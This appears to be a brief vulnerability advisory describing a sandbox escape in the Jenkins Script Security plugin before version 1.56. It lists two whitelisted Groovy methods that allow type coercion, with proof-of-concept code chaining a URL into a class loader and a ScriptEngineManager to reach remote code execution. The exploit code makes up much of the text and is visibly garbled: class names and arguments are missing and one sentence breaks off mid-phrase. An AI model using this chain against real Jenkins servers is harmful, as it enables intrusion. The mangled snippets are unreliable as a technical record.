The Jenkins Script Security plugin prior to version 1.56 was vulnerable to code execution due to a sandbox escape. The plugin whitelisted two static methods in the default configuration. These methods both allowed for type coersion between arbitrary objects and classes. For example, a java.lang.String could be coerced into a The vulnerable methods searched for a relevant constructor and automatically called it before attempting to cast. This pattern can be used to produce a gadget chain and gain remote code execution.

Vulnerable methods:

staticMethod org.codehaus.groovy.runtime.ScriptBytecodeAdapter castToType java.lang.Object java.lang.Class
staticMethod org.kohsuke.groovy.sandbox.impl.Checker checkedCast java.lang.Class java.lang.Object boolean boolean boolean


import org.codehaus.groovy.runtime.ScriptBytecodeAdapter
def url    = [""] as
def loader = ScriptBytecodeAdapter.castToType([url],
def engine = ScriptBytecodeAdapter.castToType([loader], javax.script.ScriptEngineManager)
import org.kohsuke.groovy.sandbox.impl.Checker
def url    = [""] as
def loader = Checker.checkedCast(, [url], true, false, false)
def engine = Checker.checkedCast(javax.script.ScriptEngineManager, [loader], true, false, false)